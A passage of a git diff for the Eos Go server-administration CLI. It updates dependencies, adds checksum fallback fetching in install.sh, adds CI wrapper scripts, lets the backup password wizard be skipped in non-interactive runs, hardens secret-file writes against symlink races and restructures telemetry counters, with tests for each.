gotest.tools/v3 v3.5.2 h1:7koQfIKdy+I8UTetycgUqXWSDwpgv193Ka+qRsmBY8Q=
gotest.tools/v3 v3.5.2/go.mod h1:LtdLGcnqToBH83WByAAi/wiwSFCArdFIUV/xxN4pcjA=
-libvirt.org/go/libvirt v1.11006.0 h1:xzF87ptj/7cp1h4T62w1ZMBVY8m0mQukSCstMgeiVLs=
-libvirt.org/go/libvirt v1.11006.0/go.mod h1:1WiFE8EjZfq+FCVog+rvr1yatKbKZ9FaFMZgEqxEJqQ=
+libvirt.org/go/libvirt v1.11010.0 h1:1EIh2x6qcRoIBBOvrgN62vq5FIpgUBrmGadprQ/4M0Y=
+libvirt.org/go/libvirt v1.11010.0/go.mod h1:1WiFE8EjZfq+FCVog+rvr1yatKbKZ9FaFMZgEqxEJqQ=
mvdan.cc/sh/v3 v3.12.0 h1:ejKUR7ONP5bb+UGHGEG/k9V5+pRVIyD+LsZz7o8KHrI=
mvdan.cc/sh/v3 v3.12.0/go.mod h1:Se6Cj17eYSn+sNooLZiEUnNNmNxg0imoYlTu4CyaGyg=
sigs.k8s.io/yaml v1.6.0 h1:G8fkbMSAFqgEFgh4b1wmtzDnioxFCUgTZhlbj5P9QYs=
diff --git a/install.sh b/install.sh
index 72b79fd3d..c74ec12bc 100755
--- a/install.sh
+++ b/install.sh
@@ -2,7 +2,11 @@
set -euo pipefail
trap 'echo " Installation failed on line $LINENO"; exit 1' ERR
-log() { echo "[$1] $2"; }
+log() {
+ local level="$1"
+ shift
+ printf "%s level=%s component=install.sh msg=%q\n" "$(date -u +"%Y-%m-%dT%H:%M:%SZ")" "$level" "$*"
+}
declare -A GO_CHECKSUMS=(
["linux_amd64"]="f022b6aad78e362bcba9b0b94d09ad58c5a70c6ba3b7582905fababf5fe0181a"
@@ -28,6 +32,60 @@ verify_checksum() {
fi
}
+is_placeholder_checksum() {
+ local checksum="${1:-}"
+ [[ "$checksum" =~ ^0{64}$ ]]
+}
+
+fetch_go_checksum_from_source() {
+ local go_tarball="$1"
+ local checksum_url="https://go.dev/dl/${go_tarball}.sha256"
+ local checksum_file
+ checksum_file="$(mktemp)"
+
+ if ! curl --fail --retry 3 --retry-delay 2 -sSL "$checksum_url" -o "$checksum_file"; then
+ rm -f "$checksum_file"
+ return 1
+ fi
+
+ local checksum
+ checksum="$(tr -d '[:space:]' < "$checksum_file")"
+ rm -f "$checksum_file"
+
+ if [[ ! "$checksum" =~ ^[0-9a-f]{64}$ ]]; then
+ return 1
+ fi
+
+ echo "$checksum"
+}
+
+resolve_go_checksum() {
+ local checksum_key="$1"
+ local go_tarball="$2"
+ local expected_checksum="${GO_CHECKSUMS[$checksum_key]:-}"
+
+ if [[ -n "$expected_checksum" ]] && ! is_placeholder_checksum "$expected_checksum"; then
+ log INFO "Using pinned Go checksum for ${checksum_key}"
+ echo "$expected_checksum"
+ return 0
+ fi
+
+ if is_placeholder_checksum "$expected_checksum"; then
+ log WARN "Pinned checksum placeholder detected for ${checksum_key}; using official checksum endpoint"
+ else
+ log WARN "Pinned checksum missing for ${checksum_key}; using official checksum endpoint"
+ fi
+
+ local fetched_checksum
+ if ! fetched_checksum="$(fetch_go_checksum_from_source "$go_tarball")"; then
+ log ERR "Unable to resolve checksum for ${go_tarball} from table or go.dev"
+ return 1
+ fi
+
+ log INFO "Resolved Go checksum from official source for ${go_tarball}"
+ echo "$fetched_checksum"
+}
+
# --- Platform Detection ---
PLATFORM=""
IS_LINUX=false
@@ -201,7 +259,11 @@ install_go() {
fi
local checksum_key="${os}_${arch}"
- local expected_checksum="${GO_CHECKSUMS[$checksum_key]}"
+ local expected_checksum
+ expected_checksum="$(resolve_go_checksum "$checksum_key" "$go_tarball")" || {
+ log ERR "Checksum resolution failed for ${go_tarball}"
+ exit 1
+ }
verify_checksum "$go_tarball" "$expected_checksum"
# Verify download
@@ -578,7 +640,7 @@ check_prerequisites() {
update_from_git() {
# Pull latest code from git if we're in a git repo
if [ -d "$Eos_SRC_DIR/.git" ]; then
- log INFO " Pulling latest changes from GitHub..."
+ log INFO " Pulling latest changes from git remote..."
cd "$Eos_SRC_DIR"
# RESILIENCE: Check for and recover from merge conflicts FIRST
diff --git a/magew b/magew
new file mode 100755
index 000000000..11e8fae0a
--- /dev/null
+++ b/magew
@@ -0,0 +1,42 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+repo_root="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+target="${1:-}"
+
+usage() {
+ cat <<'USAGE'
+Usage: ./magew [target]
+
+Targets:
+ ci:debug Run full CI debug parity lane
+ ci:preflight Run CI preflight checks
+ launch:verify Alias of ci:debug
+USAGE
+}
+
+case "${target}" in
+ -l|--list)
+ printf '%-20s %s\n' "ci:debug" "Run full CI debug parity lane"
+ printf '%-20s %s\n' "ci:preflight" "Run CI preflight checks"
+ printf '%-20s %s\n' "launch:verify" "Alias of ci:debug"
+ ;;
+ -h|--help|"")
+ usage
+ exit 2
+ ;;
+ ci:debug|launch:verify)
+ if [[ -f "${repo_root}/package.json" ]] && command -v npm >/dev/null 2>&1; then
+ exec npm run ci:debug --silent
+ fi
+ exec bash "${repo_root}/scripts/ci/debug.sh"
+ ;;
+ ci:preflight)
+ exec bash "${repo_root}/scripts/ci/preflight.sh"
+ ;;
+ *)
+ printf 'ERROR: unknown target: %s\n' "${target}" >&2
+ usage >&2
+ exit 2
+ ;;
+esac
diff --git a/package.json b/package.json
new file mode 100644
index 000000000..16a4f7412
--- /dev/null
+++ b/package.json
@@ -0,0 +1,39 @@
+{
+ "name": "eos",
+ "version": "0.0.0",
+ "private": true,
+ "description": "Eos CLI for Ubuntu server administration - DevSecOps tooling",
+ "scripts": {
+ "ci:debug": "bash scripts/ci/debug.sh",
+ "ci": "npm run ci:debug --silent",
+ "ci:preflight": "bash scripts/ci/preflight.sh",
+ "ci:lint": "bash scripts/ci/lint.sh",
+ "ci:lint:changed": "bash scripts/ci/lint.sh changed",
+ "ci:unit": "bash scripts/ci/test.sh unit",
+ "ci:integration": "bash scripts/ci/test.sh integration",
+ "ci:e2e-smoke": "bash scripts/ci/test.sh e2e-smoke",
+ "ci:e2e-full": "bash scripts/ci/test.sh e2e-full",
+ "ci:fuzz": "bash scripts/ci/test.sh fuzz",
+ "ci:deps-unit": "bash scripts/ci/test.sh deps-unit",
+ "ci:coverage-delta": "bash scripts/ci/coverage-delta.sh",
+ "ci:verify-parity": "bash scripts/ci/verify-parity.sh",
+ "ci:security": "bash scripts/ci/security-checks.sh",
+ "ci:self-update-quality": "bash scripts/ci/self-update-quality.sh",
+ "governance:check": "bash scripts/prompts-submodule.sh governance",
+ "governance:submodule": "bash scripts/prompts-submodule.sh freshness",
+ "hooks:install": "bash scripts/prompts-submodule.sh install-hook",
+ "test:submodule-freshness": "bash test/ci/test-submodule-freshness.sh",
+ "test:governance-check": "bash test/ci/test-governance-check.sh",
+ "test:verify-parity": "bash test/ci/test-verify-parity.sh",
+ "quality:self-update": "npm run ci:self-update-quality --silent",
+ "build": "go build -o /tmp/eos-build .",
+ "build:install": "go build -o /tmp/eos-build . && sudo install -m 0755 /tmp/eos-build /usr/local/bin/eos && echo 'eos installed to /usr/local/bin/eos'",
+ "lint": "golangci-lint run",
+ "test": "go test -short ./pkg/...",
+ "test:verbose": "go test -v -short ./pkg/...",
+ "test:race": "go test -race -short ./pkg/crypto ./pkg/interaction ./pkg/parse ./pkg/verify",
+ "fmt": "gofmt -s -w .",
+ "fmt:check": "test -z \"$(gofmt -s -l .)\"",
+ "vet": "go vet ./..."
+ }
+}
diff --git a/pkg/backup/client.go b/pkg/backup/client.go
index d317f1e8a..a04700250 100644
--- a/pkg/backup/client.go
+++ b/pkg/backup/client.go
@@ -12,6 +12,7 @@ import (
"os/exec"
"path/filepath"
"runtime/debug"
+ "strconv"
"strings"
"time"
@@ -361,6 +362,12 @@ func (c *Client) getRepositoryPassword() (string, error) {
missingErr := fmt.Errorf("restic repository password not found; expected password file at %s, secrets fallback at %s, or RESTIC_PASSWORD in %s",
localPasswordPath, secretsPasswordPath, envPath)
+ if reason := skipWizardReason(); reason != "" {
+ recordPasswordSource("wizard", false)
+ logger.Debug("Skipping password wizard", zap.String("reason", reason))
+ return "", missingErr
+ }
+
// 8. Interactive wizard fallback
password, wizardErr := c.runPasswordWizard(localPasswordPath, secretsPasswordPath, []string{envPath, secretsEnvPath})
if wizardErr == nil {
@@ -402,6 +409,34 @@ func isVaultConfigured() bool {
return strings.TrimSpace(os.Getenv("VAULT_ADDR")) != ""
}
+// skipWizardReason returns a non-empty string explaining why the password
+// wizard should be skipped, or "" if the wizard should run.
+func skipWizardReason() string {
+ if !interaction.IsTTY() {
+ return "non-interactive (no TTY)"
+ }
+
+ raw := strings.TrimSpace(os.Getenv("RESTIC_PASSWORD_SKIP_WIZARD"))
+ if raw == "" {
+ return ""
+ }
+
+ parsed, err := strconv.ParseBool(raw)
+ if err != nil {
+ return fmt.Sprintf("RESTIC_PASSWORD_SKIP_WIZARD=%q is not a valid boolean; treating as skip", raw)
+ }
+ if parsed {
+ return "RESTIC_PASSWORD_SKIP_WIZARD=true"
+ }
+ return ""
+}
+
+// shouldSkipPasswordWizard is the predicate wrapper used by callers
+// that only need a bool.
+func shouldSkipPasswordWizard() bool {
+ return skipWizardReason() != ""
+}
+
// InitRepository initializes a new restic repository
func (c *Client) InitRepository() error {
logger := otelzap.Ctx(c.rc.Ctx)
diff --git a/pkg/backup/client_test.go b/pkg/backup/client_test.go
index 34c672d3e..e033a34f3 100644
--- a/pkg/backup/client_test.go
+++ b/pkg/backup/client_test.go
@@ -3,6 +3,7 @@ package backup
import (
"context"
"encoding/json"
+ "os"
"path/filepath"
"strings"
"testing"
@@ -506,23 +507,75 @@ func TestPasswordRetrieval(t *testing.T) {
},
}
- t.Run("password retrieval logic", func(t *testing.T) {
- // This will likely fail since Vault won't be available in test
+ t.Run("password retrieval does not block in non-interactive mode", func(t *testing.T) {
+ prev := os.Getenv("RESTIC_PASSWORD_SKIP_WIZARD")
+ if err := os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", "1"); err != nil {
+ t.Fatalf("Setenv() error = %v", err)
+ }
+ t.Cleanup(func() {
+ _ = os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", prev)
+ })
+
password, err := client.getRepositoryPassword()
+ if err == nil {
+ t.Fatalf("expected missing password error, got password length=%d", len(password))
+ }
+ if password != "" {
+ t.Fatalf("expected empty password on failure, got %q", password)
+ }
+ })
+}
- if err != nil {
- t.Logf("Password retrieval failed (expected in test): %v", err)
+func TestShouldSkipPasswordWizard(t *testing.T) {
+ save := func() (string, bool) {
+ v, ok := os.LookupEnv("RESTIC_PASSWORD_SKIP_WIZARD")
+ return v, ok
+ }
+ restore := func(v string, ok bool) {
+ if ok {
+ _ = os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", v)
} else {
- // Validate password doesn't contain dangerous characters
- if containsAnyDangerousBackup(password) {
- t.Error("Retrieved password contains dangerous characters")
- }
+ _ = os.Unsetenv("RESTIC_PASSWORD_SKIP_WIZARD")
+ }
+ }
- if password == "" {
- t.Error("Password should not be empty")
- }
+ t.Run("returns true when env var is 1", func(t *testing.T) {
+ v, ok := save()
+ t.Cleanup(func() { restore(v, ok) })
+
+ _ = os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", "1")
+ if !shouldSkipPasswordWizard() {
+ t.Fatal("expected wizard skip when RESTIC_PASSWORD_SKIP_WIZARD=1")
+ }
+ })
+
+ t.Run("returns false when env var is 0", func(t *testing.T) {
+ v, ok := save()
+ t.Cleanup(func() { restore(v, ok) })
- t.Logf("Successfully retrieved password (length: %d)", len(password))
+ _ = os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", "0")
+ // Should not skip when explicitly disabled (assuming TTY present in test).
+ // If TTY detection returns false, the function still returns true.
+ // We test the env-var branch specifically.
+ reason := skipWizardReason()
+ if reason == "RESTIC_PASSWORD_SKIP_WIZARD=true" {
+ t.Fatalf("env var set to 0 should not produce skip-true reason, got %q", reason)
+ }
+ })
+
+ t.Run("returns true with reason for malformed env var", func(t *testing.T) {
+ v, ok := save()
+ t.Cleanup(func() { restore(v, ok) })
+
+ _ = os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", "maybe")
+ if !shouldSkipPasswordWizard() {
+ t.Fatal("expected wizard skip for unparseable env var")
+ }
+ reason := skipWizardReason()
+ // In non-TTY environments (CI) the TTY check fires first;
+ // the parse-error branch is only reachable when a TTY exists.
+ if reason != "non-interactive (no TTY)" && !strings.Contains(reason, "not a valid boolean") {
+ t.Fatalf("unexpected reason: %q", reason)
}
})
}
diff --git a/pkg/backup/config.go b/pkg/backup/config.go
index 0e32466da..1c20811c5 100644
--- a/pkg/backup/config.go
+++ b/pkg/backup/config.go
@@ -245,10 +245,8 @@ func classifyConfigPath(path string) string {
}
func (c *Config) applyDefaults() {
- if c.Settings.HooksPolicy.Enabled == nil {
- enabled := true
- c.Settings.HooksPolicy.Enabled = &enabled
- }
+ // Keep as an extension point for non-persisted defaults.
+ // Avoid mutating pointer-backed fields to prevent config drift on save.
}
// Validate checks if the configuration is valid
diff --git a/pkg/backup/config_test.go b/pkg/backup/config_test.go
index 65584a080..172c0ddbc 100644
--- a/pkg/backup/config_test.go
+++ b/pkg/backup/config_test.go
@@ -297,6 +297,57 @@ func TestSaveConfig(t *testing.T) {
t.Errorf("SaveConfig should fail with validation error, got: %v", err)
}
})
+
+ t.Run("does not persist implicit hooks enabled default", func(t *testing.T) {
+ tmpDir := t.TempDir()
+ savePath := filepath.Join(tmpDir, "backup.yaml")
+ origWritePath := configWritePath
+ origWriteDir := configWriteDir
+ origRead := configReadCandidates
+ t.Cleanup(func() {
+ configWritePath = origWritePath
+ configWriteDir = origWriteDir
+ configReadCandidates = origRead
+ })
+ configWritePath = savePath
+ configWriteDir = tmpDir
+ configReadCandidates = []string{savePath}
+
+ cfg := &Config{
+ DefaultRepository: "local",
+ Repositories: map[string]Repository{
+ "local": {
+ Name: "local",
+ Backend: "local",
+ URL: "/var/lib/eos/backups",
+ },
+ },
+ Profiles: map[string]Profile{
+ "test": {
+ Name: "test",
+ Repository: "local",
+ Paths: []string{"/tmp/test"},
+ },
+ },
+ Settings: Settings{
+ HooksPolicy: HooksPolicy{
+ Enabled: nil,
+ },
+ },
+ }
+
+ if err := SaveConfig(rc, cfg); err != nil {
+ t.Fatalf("SaveConfig() error = %v", err)
+ }
+
+ data, err := os.ReadFile(savePath)
+ if err != nil {
+ t.Fatalf("ReadFile() error = %v", err)
+ }
+ if strings.Contains(string(data), "enabled: true") {
+ t.Fatalf("unexpected persisted hooks default in config:\n%s", string(data))
+ }
+ })
}
func TestDefaultConfig(t *testing.T) {
diff --git a/pkg/backup/create.go b/pkg/backup/create.go
index 8e2b92ff4..4b7f50706 100644
--- a/pkg/backup/create.go
+++ b/pkg/backup/create.go
@@ -8,7 +8,6 @@ import (
"os"
"path/filepath"
"strings"
- "syscall"
"github.com/CodeMonkeyCybersecurity/eos/pkg/eos_io"
"github.com/CodeMonkeyCybersecurity/eos/pkg/shared"
@@ -16,6 +15,7 @@ import (
"github.com/spf13/cobra"
"github.com/uptrace/opentelemetry-go-extra/otelzap"
"go.uber.org/zap"
+ "golang.org/x/sys/unix"
)
var secretsDirPath = SecretsDir
@@ -279,45 +279,140 @@ func storeLocalPassword(repoName, password string) error {
return err
}
- passwordPath := filepath.Join(secretsDirPath, fmt.Sprintf("%s.password", repoName))
- if err := os.WriteFile(passwordPath, []byte(password), PasswordFilePerm); err != nil {
- return fmt.Errorf("writing password file: %w", err)
- }
-
- if err := os.Chmod(passwordPath, PasswordFilePerm); err != nil {
- return fmt.Errorf("setting password file permissions: %w", err)
+ passwordPath := filepath.Join(filepath.Clean(secretsDirPath), fmt.Sprintf("%s.password", repoName))
+ if err := secureWriteSecretFile(passwordPath, []byte(password), PasswordFilePerm); err != nil {
+ return fmt.Errorf("writing password file securely: %w", err)
}
return nil
}
func ensureSecretsDirSecure(path string) error {
- if err := os.MkdirAll(path, PasswordDirPerm); err != nil {
+ cleanPath := filepath.Clean(path)
+ if err := os.MkdirAll(cleanPath, PasswordDirPerm); err != nil {
return fmt.Errorf("creating secrets directory: %w", err)
}
- info, err := os.Stat(path)
+ info, err := os.Lstat(cleanPath)
if err != nil {
return fmt.Errorf("stating secrets directory: %w", err)
}
+ if info.Mode()&os.ModeSymlink != 0 {
+ return fmt.Errorf("secrets directory %s must not be a symlink", cleanPath)
+ }
+
if !info.IsDir() {
- return fmt.Errorf("secrets path is not a directory: %s", path)
+ return fmt.Errorf("secrets path is not a directory: %s", cleanPath)
}
+ dirFD, err := openVerifiedSecretsDir(cleanPath)
+ if err != nil {
+ return err
+ }
+ defer unix.Close(dirFD)
+
+ // SECURITY: Use FD-based Fchmod only (race-free).
+ // Path-based os.Chmod is TOCTOU-vulnerable and redundant here.
if info.Mode().Perm() != PasswordDirPerm {
- if err := os.Chmod(path, PasswordDirPerm); err != nil {
+ if err := unix.Fchmod(dirFD, uint32(PasswordDirPerm)); err != nil {
return fmt.Errorf("enforcing secrets directory permissions: %w", err)
}
}
- stat, ok := info.Sys().(*syscall.Stat_t)
- if !ok {
- return nil
+ return nil
+}
+
+func openVerifiedSecretsDir(path string) (int, error) {
+ fd, err := unix.Open(path, unix.O_RDONLY|unix.O_DIRECTORY|unix.O_NOFOLLOW|unix.O_CLOEXEC, 0)
+ if err != nil {
+ return -1, fmt.Errorf("opening secrets directory %s securely: %w", path, err)
+ }
+
+ var stat unix.Stat_t
+ if err := unix.Fstat(fd, &stat); err != nil {
+ unix.Close(fd)
+ return -1, fmt.Errorf("stating secrets directory %s: %w", path, err)
+ }
+
+ if stat.Mode&unix.S_IFMT != unix.S_IFDIR {
+ unix.Close(fd)
+ return -1, fmt.Errorf("secrets path is not a directory: %s", path)
}
if int(stat.Uid) != os.Geteuid() {
- return fmt.Errorf("secrets directory %s must be owned by uid %d (found %d)", path, os.Geteuid(), stat.Uid)
+ unix.Close(fd)
+ return -1, fmt.Errorf("secrets directory %s must be owned by uid %d (found %d)", path, os.Geteuid(), stat.Uid)
+ }
+
+ return fd, nil
+}
+
+func secureWriteSecretFile(path string, data []byte, perm os.FileMode) error {
+ cleanPath := filepath.Clean(path)
+ parentDir := filepath.Dir(cleanPath)
+ fileName := filepath.Base(cleanPath)
+ if fileName == "." || fileName == string(filepath.Separator) {
+ return fmt.Errorf("invalid secret file path: %s", cleanPath)
+ }
+
+ dirFD, err := openVerifiedSecretsDir(parentDir)
+ if err != nil {
+ return err
+ }
+ defer unix.Close(dirFD)
+
+ // SECURITY: Atomic write pattern (write-to-temp then renameat).
+ // O_CREAT|O_EXCL ensures the temp file is freshly created (no clobber).
+ // On crash, only the temp file is damaged; the original remains intact.
+ // Reference: CWE-367, POSIX rename(2) atomicity guarantee.
+ tmpName := fmt.Sprintf(".%s.tmp.%d", fileName, os.Getpid())
+
+ tmpFD, err := unix.Openat(dirFD, tmpName, unix.O_WRONLY|unix.O_CREAT|unix.O_EXCL|unix.O_NOFOLLOW|unix.O_CLOEXEC, uint32(perm))
+ if err != nil {
+ return fmt.Errorf("creating temp file for %s: %w", cleanPath, err)
+ }
+
+ // Clean up the temp file on any error path.
+ committed := false
+ defer func() {
+ if !committed {
+ _ = unix.Unlinkat(dirFD, tmpName, 0)
+ }
+ }()
+
+ tmpFile := os.NewFile(uintptr(tmpFD), filepath.Join(parentDir, tmpName))
+ defer tmpFile.Close()
+
+ written, err := tmpFile.Write(data)
+ if err != nil {
+ return fmt.Errorf("writing %s: %w", cleanPath, err)
+ }
+ if written != len(data) {
+ return fmt.Errorf("short write to %s: wrote %d of %d bytes", cleanPath, written, len(data))
+ }
+
+ if err := unix.Fchmod(tmpFD, uint32(perm)); err != nil {
+ return fmt.Errorf("setting permissions on %s: %w", cleanPath, err)
+ }
+
+ if err := tmpFile.Sync(); err != nil {
+ return fmt.Errorf("syncing %s: %w", cleanPath, err)
+ }
+
+ // SECURITY: Before atomic rename, verify the target is not a symlink.
+ // An attacker could place a symlink at the target path; renameat would
+ // replace it, but we want to reject the write entirely to avoid confusion.
+ var targetStat unix.Stat_t
+ err = unix.Fstatat(dirFD, fileName, &targetStat, unix.AT_SYMLINK_NOFOLLOW)
+ if err == nil && targetStat.Mode&unix.S_IFMT == unix.S_IFLNK {
+ return fmt.Errorf("refusing to overwrite symlink at %s", cleanPath)
+ }
+
+ // Atomic rename: replaces target only after data is fully written and synced.
+ if err := unix.Renameat(dirFD, tmpName, dirFD, fileName); err != nil {
+ return fmt.Errorf("atomically replacing %s: %w", cleanPath, err)
}
+ committed = true
return nil
}
diff --git a/pkg/backup/path_and_repository_test.go b/pkg/backup/path_and_repository_test.go
index 0c8c0c773..cd736c47b 100644
--- a/pkg/backup/path_and_repository_test.go
+++ b/pkg/backup/path_and_repository_test.go
@@ -291,6 +291,51 @@ func TestEnsureSecretsDirSecure_RejectsWrongOwner(t *testing.T) {
}
}
+func TestEnsureSecretsDirSecure_RejectsSymlink(t *testing.T) {
+ tmpDir := t.TempDir()
+ realSecrets := filepath.Join(tmpDir, "real-secrets")
+ linkSecrets := filepath.Join(tmpDir, "secrets-link")
+ if err := os.MkdirAll(realSecrets, 0o700); err != nil {
+ t.Fatalf("MkdirAll() error = %v", err)
+ }
+ if err := os.Symlink(realSecrets, linkSecrets); err != nil {
+ t.Fatalf("Symlink() error = %v", err)
+ }
+
+ if err := ensureSecretsDirSecure(linkSecrets); err == nil {
+ t.Fatal("expected symlink rejection for secrets directory")
+ }
+}
+
+func TestSecureWriteSecretFile_RejectsSymlinkTarget(t *testing.T) {
+ tmpDir := t.TempDir()
+ secretsPath := filepath.Join(tmpDir, "secrets")
+ targetPath := filepath.Join(tmpDir, "target")
+ if err := os.MkdirAll(secretsPath, 0o700); err != nil {
+ t.Fatalf("MkdirAll() error = %v", err)
+ }
+ if err := os.WriteFile(targetPath, []byte("old"), 0o600); err != nil {
+ t.Fatalf("WriteFile() error = %v", err)
+ }
+
+ passwordPath := filepath.Join(secretsPath, "repo.password")
+ if err := os.Symlink(targetPath, passwordPath); err != nil {
+ t.Fatalf("Symlink() error = %v", err)
+ }
+
+ if err := secureWriteSecretFile(passwordPath, []byte("new"), PasswordFilePerm); err == nil {
+ t.Fatal("expected secure write to fail for symlink target")
+ }
+
+ content, err := os.ReadFile(targetPath)
+ if err != nil {
+ t.Fatalf("ReadFile() error = %v", err)
+ }
+ if string(content) != "old" {
+ t.Fatalf("target content mutated through symlink: got %q", string(content))
+ }
+}
+
func TestGetRepositoryPassword_VaultFirstFallback(t *testing.T) {
rc := testRuntimeContext()
tmpDir := t.TempDir()
@@ -361,3 +406,19 @@ func TestGetRepositoryPassword_VaultFirstFallback(t *testing.T) {
t.Fatalf("expected secrets_password_file_success to increase, before=%d after=%d", beforeLocalSuccess, afterLocalSuccess)
}
}
+
+func TestPasswordSourceStructuredTelemetry(t *testing.T) {
+ beforeSource := readExpvarInt(t, backupPasswordSourceBySourceTotal, "telemetry_test_source")
+ beforeOutcome := readExpvarInt(t, backupPasswordSourceByOutcomeTotal, "success")
+
+ recordPasswordSource("telemetry_test_source", true)
+
+ afterSource := readExpvarInt(t, backupPasswordSourceBySourceTotal, "telemetry_test_source")
+ afterOutcome := readExpvarInt(t, backupPasswordSourceByOutcomeTotal, "success")
+ if afterSource <= beforeSource {
+ t.Fatalf("expected source counter to increase, before=%d after=%d", beforeSource, afterSource)
+ }
+ if afterOutcome <= beforeOutcome {
+ t.Fatalf("expected outcome counter to increase, before=%d after=%d", beforeOutcome, afterOutcome)
+ }
+}
diff --git a/pkg/backup/repository_resolution_integration_test.go b/pkg/backup/repository_resolution_integration_test.go
index 44daa16a6..31ce2d11c 100644
--- a/pkg/backup/repository_resolution_integration_test.go
+++ b/pkg/backup/repository_resolution_integration_test.go
@@ -131,3 +131,56 @@ profiles:
t.Fatalf("expected permission denied error, got %v", err)
}
}
+
+func TestIntegrationPasswordLookup_SkipWizardWhenConfigured(t *testing.T) {
+ rc := &eos_io.RuntimeContext{Ctx: context.Background(), Log: zap.NewNop()}
+ tmpDir := t.TempDir()
+
+ origRead := configReadCandidates
+ origWritePath := configWritePath
+ origWriteDir := configWriteDir
+ origSecretsDir := secretsDirPath
+ origSkip := os.Getenv("RESTIC_PASSWORD_SKIP_WIZARD")
+ t.Cleanup(func() {
+ configReadCandidates = origRead
+ configWritePath = origWritePath
+ configWriteDir = origWriteDir
+ secretsDirPath = origSecretsDir
+ _ = os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", origSkip)
+ })
+
+ configPath := filepath.Join(tmpDir, "backup.yaml")
+ configReadCandidates = []string{configPath}
+ configWritePath = configPath
+ configWriteDir = tmpDir
+ secretsDirPath = filepath.Join(tmpDir, "secrets")
+
+ cfg := &Config{
+ DefaultRepository: "repo-a",
+ Repositories: map[string]Repository{
+ "repo-a": {Name: "repo-a", Backend: "local", URL: filepath.Join(tmpDir, "repo-a")},
+ },
+ Profiles: map[string]Profile{
+ "system": {Name: "system", Repository: "repo-a", Paths: []string{tmpDir}},
+ },
+ }
+ if err := SaveConfig(rc, cfg); err != nil {
+ t.Fatalf("SaveConfig() error = %v", err)
+ }
+ if err := os.Setenv("RESTIC_PASSWORD_SKIP_WIZARD", "1"); err != nil {
+ t.Fatalf("Setenv() error = %v", err)
+ }
+
+ client, err := NewClient(rc, "repo-a")
+ if err != nil {
+ t.Fatalf("NewClient() error = %v", err)
+ }
+
+ password, err := client.getRepositoryPassword()
+ if err == nil {
+ t.Fatalf("expected missing password error, got password=%q", password)
+ }
+ if password != "" {
+ t.Fatalf("expected empty password result, got %q", password)
+ }
+}
diff --git a/pkg/backup/telemetry.go b/pkg/backup/telemetry.go
index 4f55fdadc..97e35fe1c 100644
--- a/pkg/backup/telemetry.go
+++ b/pkg/backup/telemetry.go
@@ -8,15 +8,42 @@ var (
backupConfigSourceTotal = expvar.NewMap("backup_config_source_total")
backupPasswordSourceTotal = expvar.NewMap("backup_password_source_total")
backupHookDecisionTotal = expvar.NewMap("backup_hook_decision_total")
+
+ backupRepositoryResolutionBySourceTotal = expvar.NewMap("backup_repository_resolution_by_source_total")
+ backupRepositoryResolutionByOutcomeTotal = expvar.NewMap("backup_repository_resolution_by_outcome_total")
+ backupConfigLoadBySourceTotal = expvar.NewMap("backup_config_load_by_source_total")
+ backupConfigLoadByOutcomeTotal = expvar.NewMap("backup_config_load_by_outcome_total")
+ backupConfigSourceBySourceTotal = expvar.NewMap("backup_config_source_by_source_total")
+ backupConfigSourceByOutcomeTotal = expvar.NewMap("backup_config_source_by_outcome_total")
+ backupPasswordSourceBySourceTotal = expvar.NewMap("backup_password_source_by_source_total")
+ backupPasswordSourceByOutcomeTotal = expvar.NewMap("backup_password_source_by_outcome_total")
+ backupHookDecisionBySourceTotal = expvar.NewMap("backup_hook_decision_by_source_total")
+ backupHookDecisionByOutcomeTotal = expvar.NewMap("backup_hook_decision_by_outcome_total")
)
-func recordRepositoryResolution(source string, success bool) {
- backupRepositoryResolutionTotal.Add(source+"_total", 1)
+func recordLegacyAndStructured(legacy, bySource, byOutcome *expvar.Map, source string, success bool) {
+ outcome := "failure"
if success {
- backupRepositoryResolutionTotal.Add(source+"_success", 1)
- return
+ outcome = "success"
}
- backupRepositoryResolutionTotal.Add(source+"_failure", 1)
+
+ // Keep legacy keys for compatibility with existing dashboards and tests.
+ legacy.Add(source+"_total", 1)
+ legacy.Add(source+"_"+outcome, 1)
+
+ // Structured counters keep source and outcome dimensions separate.
+ bySource.Add(source, 1)
+ byOutcome.Add(outcome, 1)
+}
+
+func recordRepositoryResolution(source string, success bool) {
+ recordLegacyAndStructured(
+ backupRepositoryResolutionTotal,
+ backupRepositoryResolutionBySourceTotal,
+ backupRepositoryResolutionByOutcomeTotal,
+ source,
+ success,
+ )
}
// RecordRepositoryResolution allows external packages (for example cmd/backup)
@@ -26,37 +53,41 @@ func RecordRepositoryResolution(source string, success bool) {
}
func recordConfigLoad(source string, success bool) {
- backupConfigLoadTotal.Add(source+"_total", 1)
- if success {
- backupConfigLoadTotal.Add(source+"_success", 1)
- return
- }
- backupConfigLoadTotal.Add(source+"_failure", 1)
+ recordLegacyAndStructured(
+ backupConfigLoadTotal,
+ backupConfigLoadBySourceTotal,
+ backupConfigLoadByOutcomeTotal,
+ source,
+ success,
+ )
}
func recordConfigSource(source string, success bool) {
- backupConfigSourceTotal.Add(source+"_total", 1)
- if success {
- backupConfigSourceTotal.Add(source+"_success", 1)
- return
- }
- backupConfigSourceTotal.Add(source+"_failure", 1)
+ recordLegacyAndStructured(
+ backupConfigSourceTotal,
+ backupConfigSourceBySourceTotal,
+ backupConfigSourceByOutcomeTotal,
+ source,
+ success,
+ )
}
func recordPasswordSource(source string, success bool) {
- backupPasswordSourceTotal.Add(source+"_total", 1)
- if success {
- backupPasswordSourceTotal.Add(source+"_success", 1)
- return
- }
- backupPasswordSourceTotal.Add(source+"_failure", 1)
+ recordLegacyAndStructured(
+ backupPasswordSourceTotal,
+ backupPasswordSourceBySourceTotal,
+ backupPasswordSourceByOutcomeTotal,
+ source,
+ success,
+ )
}
func recordHookDecision(decision string, success bool) {
- backupHookDecisionTotal.Add(decision+"_total", 1)
- if success {
- backupHookDecisionTotal.Add(decision+"_success", 1)
- return
- }
- backupHookDecisionTotal.Add(decision+"_failure", 1)
+ recordLegacyAndStructured(
+ backupHookDecisionTotal,
+ backupHookDecisionBySourceTotal,
+ backupHookDecisionByOutcomeTotal,
+ decision,
+ success,
+ )
}
diff --git a/pkg/cephfs/cephfs_fuzz_test.go b/pkg/cephfs/cephfs_fuzz_test.go
